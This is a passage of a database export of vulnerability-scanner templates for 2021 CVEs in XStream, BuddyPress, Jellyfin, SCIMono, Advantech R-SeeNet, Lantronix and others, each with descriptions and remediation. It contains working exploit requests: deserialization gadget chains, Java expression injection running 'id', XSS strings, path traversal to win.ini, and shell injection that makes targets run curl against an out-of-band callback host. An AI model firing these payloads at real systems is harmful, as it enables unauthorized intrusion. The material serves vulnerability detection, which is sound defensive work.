cve2021,cve,xstream,deserialization,rce,oast,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n \n 2\n \n \n \n \n \n \n \n \n com.sun.corba.se.impl.activation.ServerTableEntry\n \n \n \n \n com.sun.corba.se.impl.activation.ServerTableEntry\n verify\n \n \n \n \n \n \n \n \n \n \n \n true\n \n \n 1\n \n \n UTF-8\n \n \n \n \n \n \n curl http://{{interactsh-url}}\n \n \n \n \n \n \n \n \n \n 3\n javax.xml.ws.binding.attachments.inbound\n javax.xml.ws.binding.attachments.inbound\n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 
4a0a00473045022100c57ea9d8cecf995608fe7d5b0128a9e6783b30e14e86bd3ba5820cc61fb13e5c02204144080c1e53f2cbea11cc5770c68b6014c15e5d0215a769eadff83ae34e16d0:922c64590222798bb761d5b6d8e72950", "hash": "93d93788089d9fdb253400cf6ddddcce", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308272" }, "name": "CVE-2021-21351.yaml", "content": "id: CVE-2021-21351\n\ninfo:\n name: XStream <1.4.16 - Remote Code Execution\n author: pwnhxl\n severity: critical\n description: |\n XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351\n - https://x-stream.github.io/CVE-2021-21351.html\n - https://paper.seebug.org/1543/\n - http://x-stream.github.io/changes.html#1.4.16\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21351\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 9.1\n cve-id: CVE-2021-21351\n cwe-id: CWE-434\n epss-score: 0.73084\n epss-percentile: 0.98014\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve2021,cve,xstream,deserialization,rce,oast,vulhub,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n ysomap\n \n \n \n -10086\n \n <__overrideDefaultParser>false\n false\n false\n \n \n \n \n \n false\n false\n \n \n \n \n 1008\n true\n 1000\n 0\n 2\n 0\n 0\n 0\n true\n 1004\n 
false\n rmi://{{interactsh-url}}/test\n \n \n \n \n \n \n \n \n \n com.sun.rowset.JdbcRowSetImpl\n setAutoCommit\n \n boolean\n \n \n \n false\n \n \n false\n \n false\n \n -1\n false\n false\n \n 1\n \n 1\n false\n \n \n \n ysomap\n \n test\n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"timestamp\"\n - \"com.thoughtworks.xstream\"\n condition: or\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100f29c7be274baa128b1b19d0598c8a3d7805a5f14b3073a1aa9d6dae05ad2a533022100a39cddf06232b2de875c43c80596a232347000e49418a3f927b430ed8c8abbfc:922c64590222798bb761d5b6d8e72950", "hash": "f18e5e5a752da2abfe20c22923a3d85d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308273" }, "name": "CVE-2021-21389.yaml", "content": "id: CVE-2021-21389\n\ninfo:\n name: BuddyPress REST API <7.2.1 - Privilege Escalation/Remote Code Execution\n author: lotusdll\n severity: high\n description: WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information, escalate privileges, or execute arbitrary code on the affected system.\n remediation: This issue has been remediated in WordPress BuddyPress 7.2.1.\n reference:\n - https://github.com/HoangKien1020/CVE-2021-21389\n - https://buddypress.org/2021/03/buddypress-7-2-1-security-release/\n - https://codex.buddypress.org/releases/version-7-2-1/\n - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21389\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-21389\n 
cwe-id: CWE-863\n epss-score: 0.83143\n epss-percentile: 0.98347\n cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: buddypress\n product: buddypress\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,rce,wp,buddypress\n\nhttp:\n - raw:\n - |\n POST /wp-json/buddypress/v1/signup HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json; charset=UTF-8\n\n {\n \"user_login\":\"{{randstr}}\",\n \"password\":\"{{randstr}}\",\n \"user_name\":\"{{randstr}}\",\n \"user_email\":\"{{randstr}}@interact.sh\"\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"user_login\"\n - \"registered\"\n - \"activation_key\"\n - \"user_email\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b0e1b8d49d9fe1a59d88506d5d75e0740c560db375170a3e174b0f722115311a022100fc37abd7b4479a1a735a9447124a0e20493872640be3cca1318a98db23cb9662:922c64590222798bb761d5b6d8e72950", "hash": "20ef862842b8ecad496b95f99f1760a6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308274" }, "name": "CVE-2021-21402.yaml", "content": "id: CVE-2021-21402\n\ninfo:\n name: Jellyfin <10.7.0 - Local File Inclusion\n author: dwisiswant0\n severity: medium\n description: |\n Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. 
Servers exposed to public Internet are potentially at risk.\n impact: |\n Successful exploitation could allow an attacker to read sensitive files on the server.\n remediation: This is fixed in version 10.7.1.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/\n - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-wg4c-c9g9-rxhx\n - https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1\n - https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21402\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-21402\n cwe-id: CWE-22\n epss-score: 0.15589\n epss-percentile: 0.95782\n cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: jellyfin\n product: jellyfin\n shodan-query: http.html:\"Jellyfin\"\n fofa-query: title=\"Jellyfin\" || body=\"http://jellyfin.media\"\n tags: cve,cve2021,jellyfin,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/\"\n - \"{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Content-Type: application/octet-stream\"\n\n - type: regex\n part: body\n regex:\n - \"\\\\[(font|extension|file)s\\\\]\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210099094cb8ddabbb62ae1c1a3278524ca37c02baabbb89430ec56c39a6591a9f9a02201e01bb5340f1cec11d2ba496fd3b176816decd82aa4f21cff997ada5c09963fb:922c64590222798bb761d5b6d8e72950", "hash": "05bb423a18a36913e36d6c713ad412de", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308275" }, "name": "CVE-2021-21479.yaml", "content": "id: CVE-2021-21479\n\ninfo:\n name: SCIMono <0.0.19 - Remote Code Execution\n author: dwisiswant0\n severity: 
critical\n description: |\n SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and\n execute java expressions and compromise the availability and integrity of the system.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade SCIMono to version 0.0.19 or later to mitigate this vulnerability.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21479\n - https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\n cvss-score: 9.1\n cve-id: CVE-2021-21479\n cwe-id: CWE-74\n epss-score: 0.00396\n epss-percentile: 0.70798\n cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: scimono\n tags: cve,cve2021,scimono,rce,sap\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\\\"id\\\")')%7D\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"The attribute value\"\n - \"java.lang.UNIXProcess@\"\n - \"has invalid value!\"\n - '\"status\" : \"400\"'\n condition: and\n# digest: 4a0a004730450220492f92e5a086f61cde1c3cb1bce6d47be6f9bb9fe6a79dcb1e8390046a6e324b02210093a84217824268630dc66e229a860a26df1630c1e07d49c591a7b174768313a3:922c64590222798bb761d5b6d8e72950", "hash": "0b124298af0e613c516ffa9a1e97fc06", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308276" }, "name": "CVE-2021-21745.yaml", "content": "id: CVE-2021-21745\n\ninfo:\n name: ZTE MF971R - Referer authentication bypass\n author: gy741\n severity: medium\n description: 
|\n ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attacker could\n use this vulnerability to perform illegal authorization operations by sending a request to the user to click.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the router.\n remediation: |\n Apply the latest firmware update provided by ZTE to fix the authentication bypass vulnerability.\n reference:\n - https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1317\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21745\n - https://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1019764\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\n cvss-score: 4.3\n cve-id: CVE-2021-21745\n cwe-id: CWE-352\n epss-score: 0.26168\n epss-percentile: 0.96622\n cpe: cpe:2.3:o:zte:mf971r_firmware:v1.0.0b05:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zte\n product: mf971r_firmware\n tags: cve2021,cve,zte,auth-bypass,router\n\nhttp:\n - raw:\n - |\n GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1\n Host: {{Hostname}}\n Referer: http://interact.sh/127.0.0.1.html\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - 'psw_fail_num_str\":\"[0-9]'\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009e6426cc572101b45641c767c7e539db75a145714644272d3d163df59b5ea2aa022015d94f5ac290e8fb85ec786f4e590bdf9fe9fbd03a04357cc7dfa9cffa27e110:922c64590222798bb761d5b6d8e72950", "hash": "0af8c2d551f9639f6e6cd89ac75e4ba2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308277" }, "name": "CVE-2021-21799.yaml", "content": "id: CVE-2021-21799\n\ninfo:\n name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the 
telnet_form.php script functionality.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Advantech to mitigate the XSS vulnerability in R-SeeNet 2.4.12.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21799\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-21799\n cwe-id: CWE-79\n epss-score: 0.83144\n epss-percentile: 0.98156\n cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: advantech\n product: r-seenet\n shodan-query: http.html:\"R-SeeNet\"\n tags: cve2021,cve,xss,r-seenet,advantech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Telnet \"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cf3f445ac2523e140ae589eedb4c723a9d60a1d3734ddf47f76c27ceebc054d4022100907ae703851cd94586106cb70d472adad6e98a3ec9113a16e806545245aaf46b:922c64590222798bb761d5b6d8e72950", "hash": "5b156de1b104ccb8c89591803ac0535f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308278" }, "name": "CVE-2021-21800.yaml", "content": "id: CVE-2021-21800\n\ninfo:\n name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the ssh_form.php script functionality.\n remediation: |\n Apply 
the latest security patches or updates provided by Advantech to fix the XSS vulnerability in R-SeeNet 2.4.12.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21800\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Live-Hack-CVE/CVE-2021-21800\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-21800\n cwe-id: CWE-79\n epss-score: 0.80604\n epss-percentile: 0.98232\n cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: advantech\n product: r-seenet\n shodan-query: http.html:\"R-SeeNet\"\n tags: cve2021,cve,xss,r-seenet,advantech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"SSH Session \"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206e315588ca65297173b6814bc6172397458309ebd730542d6d0aed165442ab5d022054bd3fded5b447cdb4d288ef12338c62319a42e3576f5cb78f32945ed424f4dc:922c64590222798bb761d5b6d8e72950", "hash": "2001733e3dfff9adced5b2c03e2cfd0e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308279" }, "name": "CVE-2021-21801.yaml", "content": "id: CVE-2021-21801\n\ninfo:\n name: Advantech R-SeeNet - Cross-Site Scripting\n author: gy741\n severity: medium\n description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the graph parameter. 
A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in the R-SeeNet application.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21801\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-21801\n cwe-id: CWE-79\n epss-score: 0.83144\n epss-percentile: 0.98185\n cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: advantech\n product: r-seenet\n tags: cve2021,cve,rseenet,xss,graph,advantech\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"zlo onerror=alert(1) \"'\n - 'Device Status Graph'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022028dd003a44a9702befd4cdafccf356aabf08e207ef3c8c0e5eb1d535064326b402205d4243a377e793952264578149afc3cdc9910c0e9726edeb5c3bcb82fcddd527:922c64590222798bb761d5b6d8e72950", "hash": "41ed7876430e81a1a6e666edb1a31287", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30827a" }, "name": "CVE-2021-21802.yaml", "content": "id: CVE-2021-21802\n\ninfo:\n name: Advantech R-SeeNet - Cross-Site Scripting\n author: gy741\n severity: medium\n description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the 
device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in the R-SeeNet application.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21801\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-21802\n cwe-id: CWE-79\n epss-score: 0.80604\n epss-percentile: 0.98232\n cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: advantech\n product: r-seenet\n tags: cve2021,cve,rseenet,xss,advantech\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"zlo onerror=alert(1) \"'\n - 'Device Status Graph'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b65c1a7c0caee4cc49ce03a121778de8d65d17b11bb2394279d0fca029d611eb022100f2ce7dd5d0ac03d233b2fbb513a64ce3e55f76c813b11c6c83f7db84c7397774:922c64590222798bb761d5b6d8e72950", "hash": "7c7b8ca3de723274fc8378eb65aa5b94", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30827b" }, "name": "CVE-2021-21803.yaml", "content": "id: CVE-2021-21803\n\ninfo:\n name: Advantech R-SeeNet - Cross-Site Scripting\n author: gy741\n severity: medium\n description: Advantech 
R-SeeNet is vulnerable to cross-site scripting in the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Advantech to mitigate this vulnerability.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21803\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-21803\n cwe-id: CWE-79\n epss-score: 0.80604\n epss-percentile: 0.98232\n cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: advantech\n product: r-seenet\n tags: cve2021,cve,rseenet,xss,advantech\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"zlo onerror=alert(1) \"'\n - 'Device Status Graph'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220290c465e8ffed921fc075e33c05d61e6ad6c8dc976ad0768a3c67c27cf6c886d022015809e3ad84f8ad4271e11246380311837a9a3a71febd990084cb12f5a2a7961:922c64590222798bb761d5b6d8e72950", "hash": "c2092cfdf9824519196916587ea5dcdb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30827c" }, "name": "CVE-2021-21805.yaml", "content": "id: CVE-2021-21805\n\ninfo:\n name: Advantech R-SeeNet 2.4.12 - OS Command Injection\n 
author: arafatansari\n severity: critical\n description: |\n Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Update to the latest version of Advantech R-SeeNet to mitigate this vulnerability.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21805\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-21805\n cwe-id: CWE-78\n epss-score: 0.97374\n epss-percentile: 0.99895\n cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: advantech\n product: r-seenet\n shodan-query: http.html:\"R-SeeNet\"\n tags: cve2021,cve,rce,r-seenet,advantech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/php/ping.php?hostname=|dir\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Ping |dir\"\n - \"bottom.php\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950", "hash": "75614bf6ae9a65deffa9a671ac75aa4c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30827d" }, "name": 
"CVE-2021-21816.yaml", "content": "id: CVE-2021-21816\n\ninfo:\n name: D-Link DIR-3040 1.13B03 - Information Disclosure\n author: gy741\n severity: medium\n description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the router, potentially leading to further attacks.\n remediation: |\n Upgrade the router firmware to the latest version provided by D-Link.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21816\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2021-21816\n cwe-id: CWE-200\n epss-score: 0.00229\n epss-percentile: 0.60334\n cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: dir-3040_firmware\n tags: cve2021,cve,dlink,exposure,router,syslog\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/messages\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"syslog:\"\n - \"admin\"\n - \"/etc_ro/lighttpd/www\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205524508cec5a7648f3525efc7cc61e2269f85a2218a048a07c6d27965360ef0b022100cffbf244af2a53310124e9534e57a43bad9b0e544ee49ab2bfdcca089ad71ce8:922c64590222798bb761d5b6d8e72950", "hash": "9737ec9dc5ccd9b1c6a9e80e2505fce6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30827e" }, "name": "CVE-2021-21881.yaml", "content": "id: CVE-2021-21881\n\ninfo:\n name: 
Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection\n author: gy741\n severity: critical\n description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command injection in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or complete compromise of the affected device.\n remediation: |\n Apply the latest firmware update provided by Lantronix to mitigate the vulnerability.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21881\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 9.9\n cve-id: CVE-2021-21881\n cwe-id: CWE-78\n epss-score: 0.97001\n epss-percentile: 0.99723\n cpe: cpe:2.3:o:lantronix:premierwave_2050_firmware:8.9.0.0:r4:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: lantronix\n product: premierwave_2050_firmware\n tags: cve2021,cve,lantronix,rce,oast,cisco\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic dXNlcjp1c2Vy\n Content-Type: application/x-www-form-urlencoded\n\n ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic YWRtaW46UEFTUw==\n Content-Type: application/x-www-form-urlencoded\n\n ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the 
HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 490a004630440220787afb24b4404fe795e842e2aaecd864176f0b281a8a029cc7f051d784b99d95022063b2263ccd44743fed77f74ab9037062e981c2179c736dd603756ff4753b1f46:922c64590222798bb761d5b6d8e72950", "hash": "38b4350a73f5564fccfc0a9df29b02d0", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30827f" }, "name": "CVE-2021-21972.yaml", "content": "id: CVE-2021-21972\n\ninfo:\n name: VMware vSphere Client (HTML5) - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.\n reference:\n - https://swarm.ptsecurity.com/unauth-rce-vmware/\n - 